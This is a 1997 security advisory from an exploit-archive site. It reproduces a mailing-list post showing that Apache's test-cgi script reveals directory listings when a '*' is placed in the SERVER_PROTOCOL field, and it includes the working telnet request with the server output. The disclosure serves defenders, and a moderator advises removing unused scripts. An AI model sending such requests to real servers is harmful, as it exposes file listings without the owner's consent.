cgi-bin/test-cgi allows arbitrary remote file listing

Summary
Description:If you give test-cgi an argument which includes a *, you can get a directory listing from the SERVER_PROTOCOL field. In other words, it is another pathetic cgi.
Author:Jason Uhlenkott <jasonuhl@usa.net>
Compromise:remotely obtain directory listings
Vulnerable Systems:Systems running Apache/1.2b2, probably earlier versions, many systems that have test-cgi installed.
Date:6 June 1997
Details


Date: Fri, 06 Jun 1997 00:57:32 -0800
From: Jason Uhlenkott <jasonuhl@usa.net>
To: linux-security@redhat.com
Subject: [linux-security] Inventory files bug now in SERVER_PROTOCOL

Sorry if this has already been discovered.  I just read about the
test-cgi bug in which all files on the system could be inventoried if a
* was put in the QUERY_STRING.  I'm running Apache/1.2b11, which has the
QUERY_STRING problem fixed, but the same problem seems to exist in
SERVER_PROTOCOL.

SERVER_PROTOCOL is normally "HTTP/1.0".  But Apache seems to accept
anything there.  The following worked on my machine:
-------------------------------
Pentium:~$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/test-cgi *

HTTP/1.1 200 OK
Date: Fri, 06 Jun 1997 08:44:18 GMT
Server: Apache/1.2b11
Connection: close
Content-Type: text/plain

CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = Apache/1.2b11
SERVER_NAME = Pentium.corecom.net
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = printenv test-cgi
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = 
PATH_INFO = 
PATH_TRANSLATED = 
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = 
REMOTE_HOST = localhost
REMOTE_ADDR = 127.0.0.1
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
Connection closed by foreign host.
Pentium:~$
-----------------------------

Notice the "SERVER_PROTOCOL = printenv test-cgi".  These are the two
files in my cgi-bin directory.  Other directories can be viewed just as
easily (for instance, "GET /cgi-bin/test-cgi /*" will list the root
directory).

I uploaded the test-cgi script from my Apache and reproduced this bug on
a Netscape server. I haven't been able to get Netscape's version of
test-cgi yet.

[mod: This is a bug in the "test-cgi" script. CGI-scripts are very
hard to get right. The apache people just put quotes around the fields
that they could easily change from the remote site. They missed this
one.  As always, you probably don't know that "test-cgi" exists, and
you probably don't need it. I recommend that you remove all cgi
scripts that you don't use. -- REW]

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]